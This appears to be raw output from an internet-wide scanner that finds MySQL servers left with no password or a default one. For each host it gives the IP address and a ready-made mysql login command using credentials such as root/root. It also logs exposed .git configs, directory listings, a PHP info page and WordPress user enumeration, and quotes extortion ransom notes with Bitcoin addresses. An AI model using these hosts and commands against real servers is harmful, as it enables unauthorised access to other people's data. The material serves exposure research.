+plugin:MysqlSchemaPlugin
No or default MySQL authentication found.
Analysis helper :
mysql -h216.37.94.133 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 1, row count: 1, size: 16.4 kB
Found table PLEASE_READ_ME_XMG.WARNING with 1 records
Ransom notes :
1To recover your lost databases and avoid leaking it: visit http://o42xfh5kao7mrtesnok5jgdsfagjsgzxlxdlpkpd2x6lpckhzk225yad.onion and enter your unique token 2f0566cf775e48f9 and pay the required amount of Bitcoin to get it back. Databases that we have: . Your databases are downloaded and backed up on our servers. If we dont receive your payment in the next 9 Days, we will sell your database to the highest bidder or use them otherwise. To access this site you have use the tor browser https://www.torproject.org/projects/torbrowser.htmlhttp://o42xfh5kao7mrtesnok5jgdsfagjsgzxlxdlpkpd2x6lpckhzk225yad.onion2f0566cf775e48f9
Analysis helper :
mysql -h107.179.4.250 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 49, row count: 143265, size: 8.3 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.columns_priv wi...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 1Lnn7TEcDn4GHBSMNki62Fi3Jjs7dggoX8 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h172.105.33.198 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
No or default MySQL authentication found.
Analysis helper :
mysql -h49.212.152.84 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
No or default MySQL authentication found.
Analysis helper :
mysql -h80.86.94.181 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
{"msg":"module not exists:config.json"}
Databases: 52, row count: 143075, size: 7.9 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table actwin.chauffeur with...
Ransom notes :
All your data is a backed up. You must pay 0.16 BTC to 1322TfVUsgwNkWupVwEdceyRYbEZeN9qCu 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h62.171.157.49 -uroot -padmin -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/bugzilla/...
Found 9 files trough .DS_Store spidering:
/android
/linux
/linux/PigchaClient
/mac
/mac/PigchaClient.dmg
/misc
/misc/co2fun
/windows
/windows/Pi...
Databases: 71, row count: 143416, size: 8.7 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table default.app_data with...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 1Di1cM1QgTxZuwsxp9nRBc6UXUAhbMN7YX 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h3.86.28.255 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 610, row count: 2835, size: 16.4 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 0 records
Found table mysql.abdevj32 with 1...
Analysis helper :
mysql -h107.179.34.202 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 38, row count: 126659, size: 7.2 MB
Found table Z_README_TO_RECOVER.RECOVER_YOUR_DATA with 2 records
Found table mysql.audit_log_rules...
Ransom notes :
All your data is a backed up. You must pay 0.16 BTC to 1322TfVUsgwNkWupVwEdceyRYbEZeN9qCu 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h34.141.52.178 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found 6 files trough .DS_Store spidering:
/assets
/assets/css
/assets/img
/assets/js
/assets/libs
/login.html
Databases: 1, row count: 0, size: 0 B
Found table . with 0 records
Analysis helper :
mysql -h45.33.12.251 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 81, row count: 1188, size: 2.8 MB
Found table mysql.db with 8 records
Found table mysql.global_priv with 6 records
Found table mysql.u...
Ransom notes :
All your data is a backed up. You must pay 0.1 BTC to 17BRyuxS53TQshpcJYKCpPjHDFAFcCFAnJ 48 hours for recover it. After 48 hours expiration we will sell all your data on dark markets and the database dump will be dropped from our server!
Analysis helper :
mysql -h94.131.152.205 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 151, row count: 2423, size: 3.0 MB
Found table PLEASE_READ_ME_RTG.README with 1 records
Found table Z_README_TO_RECOVER.README with 1 ...
Ransom notes :
1To recover your lost Database send 0.004 Bitcoin (BTC) to our Bitcoin address: bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8 After this, contact us by email with your Server IP or Domain Name and a Proof of Payment (Payment ID). Your Database is downloaded and backed up on our servers. Backups that we have right now: Z_README_TO_RECOVER. Any email without your server IP Address or Domain Name and a Proof of Payment together will be ignored. If we dont receive your payment in the next 10 Days, we will delete or leak your sensitive information.bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8datarecover@protonmail.com 1To recover your lost Database send 0.004 Bitcoin (BTC) to our Bitcoin address: bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8 After this, contact us by email with your Server IP or Domain Name and a Proof of Payment (Payment ID). Your Database is downloaded and backed up on our servers. Backups that we have right now: Z_README_TO_RECOVER. Any email without your server IP Address or Domain Name and a Proof of Payment together will be ignored. If we dont receive your payment in the next 10 Days, we will delete or leak your sensitive information.bc1qvt6d7gjzdvf3ns8nlq56g6pzjmg74exwyu6tf8datarecover@protonmail.com
Analysis helper :
mysql -h104.223.209.52 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found PHP info page:
_SERVER["HTTP_HOST"] = 46.97.15.10
_SERVER["HTTP_USER_AGENT"] = l9explore/1.3.0
_SERVER["HTTP_ACCEPT_ENCODING"] = gzip
_SERV...
No or default MySQL authentication found.
Analysis helper :
mysql -h59.12.193.73 -uroot -proot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Databases: 1, row count: 0, size: 0 B
Found table . with 0 records
Analysis helper :
mysql -h47.91.124.248 -uroot -e"SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS, DATA_LENGTH from information_schema.TABLES where table_schema != 'information_schema' AND table_schema != 'sys' AND table_schema != 'performance_schema';"
Found Wordpress users (CVE-2017-5487):
User #1 admin
Name: admin
Url:
User #3 karina
Name: karina
Url: